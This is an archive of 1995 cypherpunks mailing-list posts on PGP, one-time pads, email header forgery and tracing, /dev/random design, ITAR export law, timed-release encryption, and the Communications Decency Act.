What machines are considered minimum requirements to use these tools? What
are the essential reference works?
-sw






From Alan.Pugh at internetMCI.COM  Mon Nov  6 19:03:53 1995
From: Alan.Pugh at internetMCI.COM (amp)
Date: Tue, 7 Nov 1995 11:03:53 +0800
Subject: using pgp to make an otp
Message-ID: <01HXC3AEU9BM91Y89B@MAIL-CLUSTER.PCY.MCI.NET>


-- [ From: amp * EMC.Ver #2.3 ] --

> While in theory the output of PGP would be ``random'' enough for a
> one-time pad, you need to take into account that there is ``header''
> information in a PGP message.  This info in the first several bytes
> indicates which key was used, how big the message is, whether the
> receiving PGP should save the decrypted file, etc. This part is not
> very random at all.

i understand the non-random portions of the pgp output, which is why i
specified in my origional message that the 1st 20 or so lines would find
their way to the bit bucket.

> The weakness in this method is that the ``key'' to the OTP is composed
> of the PGP encryption key and the plaintext used to generate the
> pad.  Both would have to be fairly well protected to prevent a bad
> guy from either a) generating his own copy of the OTP by obtaining
> the key and plaintext or b) forcing you to use a known OTP by munging
> your copy of the key or plaintext.

i'm confused here. how would the 'key' to the otp be related to my pgp
encryption key? if i strip off all the identifying information that pgp
uses to recognise how to decrypt a message, and destroy the 'clean' copy of
the file(s) that eventually became part of my otp, how could the resulting
output be tied to my key? if it could, then pgp is less secure than i give
it credit for being.

if your objection is based on the fact that my public key is a known entity,
, this can easily be bypassed by creating a brand new key from a freshly
unzipped copy of pgp. use that key to create the otp, then destroying the
key(s) used to create it.

> This technique does have its uses.  For instance, if you use DES you
> can ``seed'' it with a value, then by re-encrypting the output of DES
> repeatedly you can generate an essentially random sequence of
> values.  This can be used as a OTP for a stream cypher.

isn't this essentially what i'm doing? if it is necessary, i can do
this...(assuming a virgin key)
1. create a cyphertext of a file.
2. strip the indentifying lines.
3. create a new cyphertext from the resulting file. 
4. repeat until paranoia level < comfort zone.

my point here is that _if_ pgp output is random enough, i wouldn't need
hardware. even i, with my extremely limited programming skills could create
a .cmd file or program that could be used as imput for a stream cypher.

imo, for crypto to be useful, it has to be easy. i'm trying to find a way
to do this that can be implemented anywhere.






From tien at well.sf.ca.us  Mon Nov  6 19:31:00 1995
From: tien at well.sf.ca.us (Lee Tien)
Date: Tue, 7 Nov 1995 11:31:00 +0800
Subject: forging headers
Message-ID: <199511070249.SAA14921@well.com>


So I got this message.  How would someone identify the sender of this
message?  I'm writing an article on anonymity, with some discussion of
remailers, and want to argue that forging already permits people to raise
the costs of tracing significantly, anonymous remailers or no.  

Lee

>From: freeh at fbi.gov
>Date: Tue, 24 Oct 95 16:07:08 -0400
>Apparently-To: tien at well.sf.ca.us
>X-UIDL: 814570964.056
>
>> How difficult is it to forge headers?  How difficult is it to trace a
>> message to the actual sender if the header is forged?
>
>Not very difficult at all (to forge, that is).  This is a quick and dirty
>example that should be somewhat traceable.  If you want pointers on how to
>trace it, post the whole thing, including headers, to cypherpunks.
>
>Louis
>
>







From perry at piermont.com  Mon Nov  6 19:48:25 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Tue, 7 Nov 1995 11:48:25 +0800
Subject: forging headers
In-Reply-To: <199511070249.SAA14921@well.com>
Message-ID: <199511070255.VAA14851@jekyll.piermont.com>



You didn't send ALL the headers, only some of them. You need to send
on the full set to make a trace possible.

Lee Tien writes:
> So I got this message.  How would someone identify the sender of this
> message?  I'm writing an article on anonymity, with some discussion of
> remailers, and want to argue that forging already permits people to raise
> the costs of tracing significantly, anonymous remailers or no.  
> 
> Lee
> 
> >From: freeh at fbi.gov
> >Date: Tue, 24 Oct 95 16:07:08 -0400
> >Apparently-To: tien at well.sf.ca.us
> >X-UIDL: 814570964.056
> >
> >> How difficult is it to forge headers?  How difficult is it to trace a
> >> message to the actual sender if the header is forged?
> >
> >Not very difficult at all (to forge, that is).  This is a quick and dirty
> >example that should be somewhat traceable.  If you want pointers on how to
> >trace it, post the whole thing, including headers, to cypherpunks.
> >
> >Louis





From black at eng.usf.edu  Mon Nov  6 19:55:32 1995
From: black at eng.usf.edu (James Black)
Date: Tue, 7 Nov 1995 11:55:32 +0800
Subject: using PGP only for digital signatures
In-Reply-To: <199511062107.NAA29648@ix5.ix.netcom.com>
Message-ID: <Pine.SUN.3.91.951106170359.15489A-100000@armstrong>


Hello,

On Mon, 6 Nov 1995, Bill Stewart wrote:

> At 04:12 PM 11/4/95 -0500, James Black <black at eng.usf.edu> wrote:

> Somebody else has brought up the insecurity of using security software
> on multi-user machines, where the system administrator or anybody who cracks
> root can steal your passphrases and even replace the trustable software with
> trojan-horse versions; your students will be safer if they only trust stuff
> running on PCs from software they've verified themselves.  But you can at least
> do signature-checking safely on a multi-user machine if the software is
> protected adequately.

  I brought up the security issue with the administrator that I am 
talking with, about the implementation of PGP as it looks like it will go 
through all the hurdles.  The last difficulty is that we have a student 
that has an account here, but he is actually overseas (so we will have 
two copies of PGP, and he will use the international one, not the US 
one).  The security issue is important.  Part of that is that most users 
use dumb terminals, so any programs ran will be done on remote servers.  
My solution (until I get a better idea) is to just write a mail program 
that can check the hash value (I think that is the term) of the PGP 
executable, compare it against the one that it created originally and use 
it, only if they are the same.  The user can also request the number, and 
write it down for his own personal comparisons.   The program will also 
automatically encrypt, if it finds the public key on the user's keyring, 
or the universities keyring.  I will now check on how secure the LAN 
network is, as I am a student and I want to know that the system is 
safe.  She (the administrator) felt that if it is safe against people 
getting into accounts it should be safe, but if I my signature is on a 
document, then people will believe that it is from me (until I state 
otherwise), and that could be more damaging than getting into my account.
  Well, I am looking into the security side, since the legal issues are 
pretty much done with (IMOHO).  If anyone has any brilliant ideas as to 
how to run PGP on a multi-user network utilitizing dumb terminals so it 
can be transparent I am interested in options.
  Well, take care and have fun, and I will look for RIPEM (I think that 
was the name) and see if that will be adequate, at the moment.

James Black
black at suntan.eng.usf.edu





From frogfarm at yakko.cs.wmich.edu  Mon Nov  6 20:00:44 1995
From: frogfarm at yakko.cs.wmich.edu (Damaged Justice)
Date: Tue, 7 Nov 1995 12:00:44 +0800
Subject: DejaNews all over again
In-Reply-To: <m0tCZ3A-0005LoC@skypoint.com>
Message-ID: <199511062222.RAA14762@yakko.cs.wmich.edu>



My two cents: I've used Dejanews for almost a month now, and have been
consistently impressed with the results. The uses are many; the danger,
as others have noted, is that people forget (or never realize in the
first place) that you should never post anything to Usenet that you
wouldn't want to see plastered on the evening news.

Having said that, I'm greatly looking forward to the impending addition
of the alt.* groups to their archives. Everyone is indeed a Kibo now,
and the general public has become more aware of the need for reputations
as a result.

--
 http://yakko.cs.wmich.edu/~frogfarm  ..for the best in unapproved information
  EmmaGoldmanCamillePagliaMarieCurieAynRandSapphoDianaToriAmosPJHarvey&Demona
 Living in dread with your fragile brain and the executioner's got your number
 I feel a groove comin' on                              Freedom...yeah, right.






From tcmay at got.net  Mon Nov  6 20:04:43 1995
From: tcmay at got.net (Timothy C. May)
Date: Tue, 7 Nov 1995 12:04:43 +0800
Subject: toolkits?
Message-ID: <acc407190e0210046725@[205.199.118.202]>


At 12:41 AM 11/7/95, Stephen Whitaker wrote:
>OK folks, nobody seems to have any ideas how to keep our little state of
>Vermont from falling prey to mediocrity in the internet. I thought with so
>many highly opinionated people I would at least get a few good or at least
>entertaining suggestions.

You may have gotten no responses because it generally is not up to a state
government to ensure that "mediocrity" in the Internet is avoided (though
I'm not sure what is meant by "mediocrity." If it is security and
anonymity, this is definitely the state government's responsibility, or
even area of interest.)


>just might have a prayer of doing it right, whatever that is. What would it
>look like if secure communications and anonomynity were designed in from the
>start? Is this what Sameer is doing in Bezerkeley?
>
>What machines are considered minimum requirements to use these tools? What
>are the essential reference works?

"Security and anonymity" are not matters for government to ensure.

Imagine two Vermont residents, Bob of Burlington and Rhonda of Rutland. The
wish to communicate securely, and perhaps anonymously. Alas, the state
legislature in Montpelier is oblivious to their concerns, not even
answering their e-mail. What, oh what, are they to do?

Not to worry, as what Vermont does is irrelevant. Bob of Burlington can
encrypt his messages to Rhonda of Rutland and send them in any number of
ways. Compuserve, AOL, and (probably) Netcom will have local access points.


Happily, Rhonda of Rutland and Bob of Burlington (not their real names) can
communicate secretly, securely, and anonymously.

I urge you, Stephen, to read up on encryption and the benefits contained
therein. Looking to your state capital to secure your communications is a
lose.


--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From junger at pdj2-ra.F-REMOTE.CWRU.Edu  Mon Nov  6 20:14:19 1995
From: junger at pdj2-ra.F-REMOTE.CWRU.Edu (Peter D. Junger)
Date: Tue, 7 Nov 1995 12:14:19 +0800
Subject: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <199511061924.OAA14371@jekyll.piermont.com>
Message-ID: <m0tCcXa-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>


"Perry E. Metzger" writes:

: 
: "Peter D. Junger" writes:
: > "Perry E. Metzger" writes:
: > : It isn't clear that telecoms treaties don't implicitly make this legal
: > : in spite of the export regulations.
: > 
: > Once again, what the ITAR forbid is the disclosure of cryptographic
: > software to a foreign person within or without the United States, so
: > it does not make any difference whether the message containing the
: > code passes through the United States or not.
: 
: I understand that you are a lawyer and I'm not, but it is my
: understanding that international treaties come in to play on this sort
: of thing. For instance, in international shipments, you can transship
: items and substances that are illegal to possess in a country through
: its ports provided that the materials do not originate or terminate
: their shipment in the country and remain sealed in their containers
: throughout. It is also my understanding that items like mail and phone
: calls that happen to transit a country are not necessarily subject to
: that nations laws provided that the nation is not a terminal point for
: the mail or call or what have you.

The trouble is that the ITAR's definition of export that is relevant
to cryptographic software has nothing to do with exporting in the
normal sense, and therefore it has nothing to do with transhipments.

The definition of export that is relevant simply makes it a felony to
disclose  technical data, which is defined as including cryptographic
software, to a foreign person within or without the United States.
Thus I cannot disclose my materials for my course in Computers and the
Law, which include some cryptographic software, to a Canadian student
in the United States without getting a license, event though there is
an exception which would allow me to export the software to Canada.

It doesn't make any difference whether the disclosure--or the message
that makes the disclosure possible--passes through a foreign
jurisdiction or not.  It is the disclosure, and only the disclosure,
that requires the license.  Not the transmission of the message.

Don't blame this on my being a lawyer; blame it on some very sick
people in the Office of Defense Trade Controls and in the NSA.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger at pdj2-ra.f-remote.cwru.edu    junger at samsara.law.cwru.edu





From tytso at MIT.EDU  Mon Nov  6 20:18:42 1995
From: tytso at MIT.EDU (Theodore Ts'o)
Date: Tue, 7 Nov 1995 12:18:42 +0800
Subject: /dev/random - using up entropy?
In-Reply-To: <199511042352.PAA07554@ix4.ix.netcom.com>
Message-ID: <9511070110.AA07972@dcl.MIT.EDU>


   Date: Sat, 04 Nov 1995 15:52:03 -0800
   From: Bill Stewart <stewarts at ix.netcom.com>

   So that says you use up m bits of entropy if you get m bits of good output.

   However, what I'd like to suggest is that you don't, from the perspective
   of a user who doesn't have direct access to the reservoir R of random bits.
   For that user, p(X|H(R)=O) is the same as p(X) or P(X|H(R)=O'), because
   the user is neither able to invert H, nor to enumerate all possible R,
   nor to calculate anything useful based on multiple outputs, since the
   reservoir R is shuffled between outputs; even a simple circular shift
   may be enough.   This doesn't apply to the case where n is 32 or 48
   and the hash function produces n-bit outputs, or even m<<n bit outputs,
   because that maybe be inverted or brute-forced, but it seems to apply
   for the case where n is sufficiently large and the hash is good.
   If the hash is simpler than MD5, it may apply anyway, since the hash
   produces far fewer bits than its input, as long as the hash and the
   mixing function don't give away any information about the reservoir
   between successive outputs.

All of this assumes that MD5 or SHA, or whatever, is a "good hash
function".  Unfortunately, this strikes at the heart of "what we don't
know" about writing good hash functions, which is still today much more
of an art rather than a science.

So the conservative among us will probably not want to count on this
fact when generating long-term, valuable secrets, like public/private
keypairs

   This would suggest that /dev/random ought to have a mode that says
   "give me output of whatever quality you have available",
   and that it ought to be OK to use it, as long as the reservoir has 
   been seeded with sufficient high-entropy input to have decent randomness.

Yup; in the Linux implementation which I've done, that's what the
/dev/urandom device is all about.  For most purposes, it's *probably*
good enough.  However, I would character it as numbers which are
"cryptogrphically random", as opposed to "truely random", in that they
depend on the intractibility of MD5 towards analysis.  One can imagine
descending scale of "quality of random numbers" where physically
generated random numbers would best, followed by /dev/random numbers,
followed by /dev/urandom numbers.  It may be that /dev/urandom is just
as hard as /dev/random --- but given the our current knowledge, it's
impossible to prove one way or the other.  

						- Ted

P.S.  Here's the header from my current /dev/random driver, if people
are interested:

/*
 * random.c -- A strong random number generator
 *
 * Version 0.95, last modified 4-Nov-95
 * 
 * Copyright Theodore Ts'o, 1994, 1995.  All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, and the entire permission notice in its entirety,
 *    including the disclaimer of warranties.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 * 3. The name of the author may not be used to endorse or promote
 *    products derived from this software without specific prior
 *    written permission.
 * 
 * ALTERNATIVELY, this product may be distributed under the terms of
 * the GNU Public License, in which case the provisions of the GPL are
 * required INSTEAD OF the above restrictions.  (This clause is
 * necessary due to a potential bad interaction between the GPL and
 * the restrictions contained in a BSD-style copyright.)
 * 
 * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED
 * WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
 * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
 * DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
 * INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
 * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
 * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
 * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
 * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
 * OF THE POSSIBILITY OF SUCH DAMAGE.
 */

/*
 * (now, with legal B.S. out of the way.....) 
 * 
 * This routine gathers environmental noise from device drivers, etc.,
 * and returns good random numbers, suitable for cryptographic use.
 * Besides the obvious cryptographic uses, these numbers are also good
 * for seeding TCP sequence numbers, and other places where it is
 * desireable to have numbers which are not only random, but hard to
 * predict by an attacker.
 *
 * Theory of operation
 * ===================
 * 
 * Computers are very predictable devices.  Hence it is extremely hard
 * to produce truely random numbers on a computer --- as opposed to
 * pseudo-random numbers, which can easily generated by using a
 * algorithm.  Unfortunately, it is very easy for attackers to guess
 * the sequence of pseudo-random number generators, and for some
 * applications this is not acceptable.  So instead, we must try to
 * gather "environmental noise" from the computer's environment, which
 * must be hard for outside attackers to observe, and use that to
 * generate random numbers.  In a Unix environment, this is best done
 * from inside the kernel.
 * 
 * Sources of randomness from the environment include inter-keyboard
 * timings, inter-interrupt timings from some interrupts, and other
 * events which are both (a) non-deterministic and (b) hard for an
 * outside observer to measure.  Randomness from these sources are
 * added to an "entropy pool", which is mixed using a CRC-like function.
 * This is not cryptographically strong, but it is adequate assuming
 * the randomness is not chosen maliciously, and it is fast enough that
 * the overhead of doing it on every interrupt is very reasonable.
 * As random bytes are mixed into the entropy pool, the routines keep
 * an *estimate* of how many bits of randomness have been stored into
 * the random number generator's internal state.
 * 
 * When random bytes are desired, they are obtained by taking the MD5
 * hash of the contents of the "entropy pool".  The MD5 hash avoids
 * exposing the internal state of the entropy pool.  It is believed to
 * be computationally infeasible to derive any useful information
 * about the input of MD5 from its output.  Even if it is possible to
 * analyze MD5 in some clever way, as long as the amount of data
 * returned from the generator is less than the inherent entropy in
 * the pool, the output data is totally unpredictable.  For this
 * reason, the routine decreases its internal estimate of how many
 * bits of "true randomness" are contained in the entropy pool as it
 * outputs random numbers.
 * 
 * If this estimate goes to zero, the routine can still generate
 * random numbers; however, an attacker may (at least in theory) be
 * able to infer the future output of the generator from prior
 * outputs.  This requires successful cryptanalysis of MD5, which is
 * not believed to be feasible, but there is a remote possiblility.
 * Nonetheless, these numbers should be useful for the vast majority
 * of purposes.
 * 
 * Exported interfaces ---- output
 * ===============================
 * 
 * There are three exported interfaces; the first is one designed to
 * be used from within the kernel:
 *
 * 	void get_random_bytes(void *buf, int nbytes);
 *
 * This interface will return the requested number of random bytes,
 * and place it in the requested buffer.
 * 
 * The two other interfaces are two character devices /dev/random and
 * /dev/urandom.  /dev/random is suitable for use when very high
 * quality randomness is desired (for example, for key generation or
 * one-time pads), as it will only return a maximum of the number of
 * bits of randomness (as estimated by the random number generator)
 * contained in the entropy pool.
 * 
 * The /dev/urandom device does not have this limit, and will return
 * as many bytes as are requested.  As more and more random bytes are
 * requested without giving time for the entropy pool to recharge,
 * this will result in random numbers that are merely cryptographically
 * strong.  For many applications, however, this is acceptable.
 *
 * Exported interfaces ---- input
 * ==============================
 * 
 * The current exported interfaces for gathering environmental noise
 * from the devices are:
 * 
 * 	void add_keyboard_randomness(unsigned char scancode);
 * 	void add_mouse_randomness(__u32 mouse_data);
 * 	void add_interrupt_randomness(int irq);
 * 	void add_blkdev_randomness(int irq);
 * 
 * add_keyboard_randomness() uses the inter-keypress timing, as well as the
 * scancode as random inputs into the "entropy pool".
 * 
 * add_mouse_randomness() uses the mouse interrupt timing, as well as
 * the reported position of the mouse from the hardware.
 *
 * add_interrupt_randomness() uses the inter-interrupt timing as random
 * inputs to the entropy pool.  Note that not all interrupts are good
 * sources of randomness!  For example, the timer interrupts is not a
 * good choice, because the periodicity of the interrupts is to
 * regular, and hence predictable to an attacker.  Disk interrupts are
 * a better measure, since the timing of the disk interrupts are more
 * unpredictable.
 * 
 * add_blkdev_randomness() times the finishing time of block requests.
 * 
 * All of these routines try to estimate how many bits of randomness a
 * particular randomness source.  They do this by keeping track of the
 * first and second order deltas of the event timings.
 *
 * Acknowledgements:
 * =================
 *
 * Ideas for constructing this random number generator were derived
 * from the Pretty Good Privacy's random number generator, and from
 * private discussions with Phil Karn.  Colin Plumb provided a faster
 * random number generator, which speed up the mixing function of the
 * entropy pool, taken from PGP 3.0 (under development).  It has since
 * been modified by myself to provide better mixing in the case where
 * the input values to add_entropy_word() are mostly small numbers.
 * 
 * Any flaws in the design are solely my responsibility, and should
 * not be attributed to the Phil, Colin, or any of authors of PGP.
 * 
 * The code for MD5 transform was taken from Colin Plumb's
 * implementation, which has been placed in the public domain.  The
 * MD5 cryptographic checksum was devised by Ronald Rivest, and is
 * documented in RFC 1321, "The MD5 Message Digest Algorithm".
 * 
 * Further background information on this topic may be obtained from
 * RFC 1750, "Randomness Recommendations for Security", by Donald
 * Eastlake, Steve Crocker, and Jeff Schiller.
 */







From shields at tembel.org  Mon Nov  6 20:22:57 1995
From: shields at tembel.org (Michael Shields)
Date: Tue, 7 Nov 1995 12:22:57 +0800
Subject: censored? corrected [Steve Pizzo cited in The Spotlight]
In-Reply-To: <9511061509.AA10512@mhv.net>
Message-ID: <47m051$236@yage.tembel.org>


In article <9511061509.AA10512 at mhv.net>,
Lynne L. Harrison <lharrison at mhv.net> wrote:
>   If, however, the growth continues with people, not only accessing the net,
> but getting domain names - doesn't it seem likely that, at some point, only
> IP addresses will be left (or dumb domain names like http://www.stkdlcp.com)?
>   Ergo, what is the problem with having a numerical URL?

Stability.  Originally DNS was just a handy user-friendly thing, but then
it because the primary way to name a host.  This allowed the IP address
to become irrelevant, which allows entire sites to be renumbered when the
network topology changes.  This is important to keep the routing tables
small (by minimizing the backwards-compatibility exceptions), which is
a critical problem today.  Thus all recent architectural decisions have
been away from direct use of IP addresses anywhere.

DNS zone table size is also a problem; solutions will probably be in the
form of new top-level domains.  You might be see http://fubarco.www or
http://www.ibm or http://www.fubarco.inc, but not http://10.5.23.10.

Neither routing table scaling nor DNS zone scaling is really on-topic;
if you're interested I'll give you some pointers in private mail.
-- 
Shields.





From shields at tembel.org  Mon Nov  6 20:26:41 1995
From: shields at tembel.org (Michael Shields)
Date: Tue, 7 Nov 1995 12:26:41 +0800
Subject: Timed-release crypto and information economics
Message-ID: <47m82v$4p4@yage.tembel.org>


-----BEGIN PGP SIGNED MESSAGE-----

1. Method

In 1993, Timothy C. May posted a message to this list
<URL:http://www.hks.net/cpunks/cpunks-0/1460.html> with some thoughts on
time-release crypto.  I think his system is too complex.  Here I present
a cleaner model, and show how it can be used in several real-life ways.

In the May proposal, when you have a message to be encrypted, you
encrypt it with a session key, optionally split that key with an n-of-m
scheme, and then send the key into a network of escrow agents, which are
instructed to hold the message for a given period of time.  You then
hold onto the encrypted message, though you need not keep it secret.
Conceptually, you have encrypted a message and then remailed the key to
yourself in such a way that it will take X length of time to arrive.

I have a simpler, public-key plan.  When you want to keep a message
secret until date X, you ask your favorite crypto house to generate a
key pair and hold the secret key until date X.  You then encrypt your
message with the public key, and again hold onto the encrypted message.
N-of-m trust management can be implemented by secret-sharing your message
and encrypting each with a key generated by a different crypto house.

This method is clean, fully anonymous, and nearly stateless.

2. Economics

I've worked out a payment model for both the public and secret key, which
I think can be used for any sort of information in an information economy
not based on (increasingly unenforceable) intellectual property laws.

In this model, the creator of information charges enough to recover
his costs (call this price, the price available to the first buyers,
the "primary cost").  It is then possible for resellers to purchase
it and try to make a profit through multiple sales at a lower price.
If the reseller is hoarding the information, another one can step in,
pay the same initial rate, and try to do better.

This model seperates marketing of information from producing it, and gives
an easy way to profit from doing either.  Of course, it's possible to
conflate them into a information creator that sells directly to end-users.

Once you abstract this you'll notice that (a) it's much like existing
models for those who create information for hire, such as writers and
programmers who sign over copyright but could recreate the work; and
(b) it can be applied to many less extreme scenarios, such as where the
reseller makes the product available but under a restrictive licence.
I think this is the basic fabric of an information economy.

Applying it to the selling of timed-release pairs, the primary cost
of the public key is some nominal charge, and the primary cost of the
secret key is the amount required to judge whether or not it should be
released -- a trivial amount for time-based release but something more
for event-based release.  (A corollary is that you might pay the judging
fee for a secret key, and receive instead a certificate saying that it
cannot yet be released.)

3. Applications

* Bonds: You deliver $1000 in ecash to the issuer.  In returns it gives
  you a unique certificate redeemable for $1100, encrypted such that
  it may not be decrypted until the maturity date.  You also get a
  certificate saying that your encrypted bond is a bond, so that you
  may demonstrate fraud if you find something else once you decrypt
  it at maturity.  Essentially this is the same as creating a private
  corporate ecash bank.  Coupon bonds are a trivial extension.

* Retirement plans, cryonics funds, and wills: You encrypt your assets
  or your will in a custom event-based key, and archive it with your
  executor.

* Idea futures: You have a pair of key pairs generated, one for
  encrypting YES coupons, and the other for NO coupons.  Now anyone
  can generate and sell their own coupons, consisting of $1 in ecash
  encrypted with a YES or NO event-release key, again with a certificate
  of authenticity to verify fraud.

* Bonding: You pay $1001 for a reputable institution to give you a $1000
  bond encrypted in the event-release key based on your breech of
  contract, and its complementary negative key, and send you and the
  other party each one bond.  If you default on your contract, the
  injured party can ask the crypto house to release the default key;
  if you do not, you can ask the crypto house to release the other key.

4. Cypherpunks write code

I'll let everyone tear into this for a few days, and then I'll put up a
server for timed-release key generation, charging maybe c$1.  I'd like
to then enhance it to be capable of issuing bonds and loans denominated
in c$.  (I like the cyberbucks trial because it's officially play money,
so there aren't any regulatory burdens.)  This should be interesting.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMJ6jgeyjYMb1RsVfAQHKPAP8CF8HAN3dPa0QaJ3knDuv5gKd2yIUE57G
icK5flsVOHcmq2+y3LkB8uCWBT1IxyoWv9I2u1yQbujYtttjgparCoCeErXk7uPe
h7yY/eZzx3wgIrGxMEGePZftwoA2aGfyO+wDy/5lPZ0yWxLpoLr67RfpWbutqinf
bmn6xeL64lg=
=iXOF
-----END PGP SIGNATURE-----
-- 
Shields.





From s1113645 at tesla.cc.uottawa.ca  Mon Nov  6 20:36:15 1995
From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca)
Date: Tue, 7 Nov 1995 12:36:15 +0800
Subject: DejaNews all over again--a URL for Usenet Searching
In-Reply-To: <acc3adfa0702100476eb@[205.199.118.202]>
Message-ID: <Pine.3.89.9511061651.D23552-0100000@tesla.cc.uottawa.ca>


Synchronicity at work.

On Mon, 6 Nov 1995, Timothy C. May wrote:

> http://dejanews.com/
> 
> It allows searching of Usenet archives (a few months' worth, from what I
> can see).

It's extremely funny that you of all people should post this Tim, as your
tcmay at got.net address was the first thing I ran a search on when I 
discovered this site. 

Judging by the amount of posting you do here, I was surprised that I only
got 36 listings on your new address (1/3 of which quoted you but not 
directly written by you). Either you post more to alt, soc and talk (which they 
don't have) or you use a third address (the second thing I tried was 
tcmay at netcom.com, even less, though the archive's pretty recent, so that's
expected).

Hmm, so you know insiders at Apple and recently held around $65,000 of their 
stock and sold off, saving around $12k in the process after being tipped 
off? Hmmm... (from rec.investment or something along those lines. Want me
to repost your original article? heheheh. <insert evil smile>)

I figured I'd send this to you as a private note, but then I figured 
this thing really is scary and has a lot to do with anonymity. 
Watch out folks. Litte Brother is saving everything you've ever said on 
usenet. Your old posts just won't go away. 

(Not that someone who is so open in his views and true name as yourself 
would mind, Tim, but I'm certainly happy for my sake, that alt isn't archived 
yet. It's bad enough they have rec.)

Ps. I will of course run searches on every other address that the who
command on majordomo at toad.com supplies me with, so watch what you say 
ladies, gents and otherwise. ;->
Get those 'nyms ready.





From vznuri at netcom.com  Mon Nov  6 20:49:45 1995
From: vznuri at netcom.com (Vladimir Z. Nuri)
Date: Tue, 7 Nov 1995 12:49:45 +0800
Subject: "The Policeman Inside"
In-Reply-To: <acc2319202021004e8ac@[205.199.118.202]>
Message-ID: <199511070019.QAA27707@netcom18.netcom.com>


TCM:

>Even if one believes taxes are "the price paid for civilization," there are
>superior alternatives to the current system. (My current favorite is:
>mandatory slavery for X days per year, regardless of age or ability.
>Instead of taxes, everyone works one day in five, or 2 months out of the
>year, etc., for the herd. Building roads, picking up trash, administering
>computers, etc. There are "lots of issues," but even I agree this list is
>not the best place to discuss it; I mention it in passing.)

good lord!! a kindler, gentler TCM!! a closet socialist!!

this does NOT sound like something I would read from the founder of
cryptoanarchy.

what is cyberspace coming to?






From lharrison at mhv.net  Mon Nov  6 21:05:34 1995
From: lharrison at mhv.net (Lynne L. Harrison)
Date: Tue, 7 Nov 1995 13:05:34 +0800
Subject: FWD:Religious Right Threatens to Shut Down Net: Call NOW
Message-ID: <9511070330.AA15297@mhv.net>


>Return-Path: <ACLUNATL at aol.com>
>Date: Mon, 6 Nov 1995 13:43:13 -0500
>From: ACLUNATL at aol.com
>To: beeson at aclu.org
>Subject: Religious Right Threatens to Shut Down Net: Call NOW
>Content-Length: 27519
>
>Here are the advocacy instructions for individuals opposed to the Federal
>Online Indecency Legislation that we promised last week.
>
>========================================================================
>       CAMPAIGN TO STOP THE EXON/COATS COMMUNICATIONS DECENCY ACT
>	(SEE THE LIST OF CAMPAIGN COALITION MEMBERS AT THE END)
>
>	Update: -Latest News:
>		 The Christian Coalition is pushing Congress to censor
>		 the net more heavily than even Sen. J.J. Exon ever imagined.
>	 	 There is the very real possibility that they may succeed.
>
>		 You should be very worried.  We are.
>
>		-What You Can Do Now:
>	 	 Follow the directions below and call House Speaker
>		 Gingrich and Senate Leader Dole.  Implore them
>		 to allow parents to make choices for their children, instead
>		 of government censors.
>
>		 Volunteer to join the fight by helping organize in your
>		 home town.  
>
>        CAMPAIGN TO STOP THE UNCONSTITUTIONAL COMMUNICATIONS DECENCY ACT
>			   Nov 2, 1995
>
>      PLEASE WIDELY REDISTRIBUTE THIS DOCUMENT WITH THIS BANNER INTACT
>		REDISTRIBUTE ONLY UNTIL December 1, 1995
>	       REPRODUCE THIS ALERT ONLY IN RELEVANT FORUMS
>
>________________________________________________________________________
>CONTENTS
>	The Latest News
>	What You Can Do Now
>	The letter from Ed Meese and the Christian Right
>	Chronology of the CDA
>        For More Information
>        List Of Participating Organizations
>
>________________________________________________________________________
>THE LATEST NEWS
>
>Since the very first day that Senator J.J. Exon (D-NE) proposed censorship
>legislation for the Internet, the Christian Right has pushed for the most
>restrictive regulations they could think of.
>
>The Religious Right (which does not necessarily speak for all religious
>people concerned with this issue) recently tipped their hand in a letter
>to Sen. Larry Pressler (R-SD) and Rep. Thomas Bliley (R-VA) requesting
>a new and more restrictive net censorship proposal.
>
>There are essentially three new dangerous elements of their campaign
>to shut down cyberspace:
>
>
>INTERNET PROVIDERS, ONLINE SERVICES, AND LIBRARIES CRIMINALLY LIABLE FOR
> EXPRESSION ONLINE
>The Religious Right has proposed to hold anyone who provides access to the
>Internet or other interactive media, including online services providers,
>ISP's, BBS's, Libraries, and Schools, criminally liable for all speech
>carried on the network.
>
>In order to avoid liability under this provision, service providers would be
>forced to monitor user's electronic communications to be assured that
>no "indecent" material is transmitted across their networks.
>
>This proposal is MORE RESTRICTIVE than the Exon Communications Decency Act,
>or any other net censorship legislation currently in Congress.
>
>In their letter to Congress, the Religious Right says:
>
>	[Providers] would simply be required to avoid KNOWING violations of
>	the law. [emphasis added]
>
>However, the "knowing" standard is vague enough that the mere knowledge
>that such material exists could be sufficient to trigger criminal liability.
>A single complaint or even a news report could force a service provider to
>take down a web page, remove posts to chat rooms or other discussion
>forums, or shut down listservs in order to avoid going to jail and facing
>huge fines.
>
>
>A STANDARD FOR INDECENCY
>The proposals pushed by the Christian Coalition relies on the
>unconstitutional "indecency standard".  Like the Exon Communications
